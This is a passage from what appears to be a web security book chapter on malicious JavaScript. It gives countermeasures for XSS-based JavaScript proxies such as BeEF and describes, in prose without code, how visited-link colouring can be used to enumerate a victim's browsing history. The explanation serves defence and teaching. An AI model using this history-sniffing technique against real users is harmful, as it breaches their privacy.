Figure 4-4 shows an example.
JavaScript Proxies Countermeasure
Countermeasures for malicious JavaScript proxies are the same as those used for XSS
attacks: input filtering and output validation. This is because JavaScript proxies are
generally utilized once a XSS flaw has been identified in a target web application. An
additional countermeasure for users is to use a browser plug-in such as NoScript (http://
noscript.net/) for Firefox, which disables JavaScript by default.
Figure 4-4 The BeEF proxy with a victim attached
Chapter 4: Malicious JavaScript and AJAX 95
Visited URL Enumeration
Popularity: 5
Simplicity: 7
Impact: 8
Risk Rating: 7
In addition to hijacking control of a victim??™s browser through the use of XSS proxies,
malicious JavaScript can also be used to compromise a victim??™s privacy significantly by
determining the victim??™s browsing history. In this attack, first published by Jeremiah
Grossman, an attacker uses a combination of JavaScript and XSS to obtain a victim??™s
browsing history. The attacker uses CSS to set the color of visited URLs to a known color
value. Then, JavaScript is used to loop through a list of URLs and examine at their color
values.
Pages:
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196